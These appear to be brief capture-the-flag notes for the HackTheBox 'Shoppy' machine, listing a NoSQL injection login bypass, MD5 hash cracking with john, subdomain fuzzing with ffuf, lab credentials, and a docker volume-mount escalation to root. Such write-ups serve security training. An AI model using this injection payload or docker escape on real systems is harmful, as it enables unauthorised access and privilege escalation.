https://shoppy.htb

NoSQLi : admin'||''==='

https://shoppy.htb/exports/export-search.json

john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

ffuf -H "Host: FUZZ.shoppy.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.129.45.105 -fs 169

http://mattermost.shoppy.htb/

josh:remembermethisway

For the deploy machine, you can create an account with these creds :
username: jaeger
password: Sh0ppyBest@pp!

SSH

sudo -u deploy /home/deploy/password-manager

cat  /home/deploy/password-manager
master password: Sample

jaeger@shoppy:/home/deploy$ sudo -u deploy /home/deploy/password-manager
Welcome to Josh password manager!
Please enter your master password: Sample
Access granted! Here is creds !
Deploy Creds :
username: deploy
password: Deploying@pp!

Login as deploy

For Root:
docker run -v /:/mnt --rm -it alpine chroot /mnt sh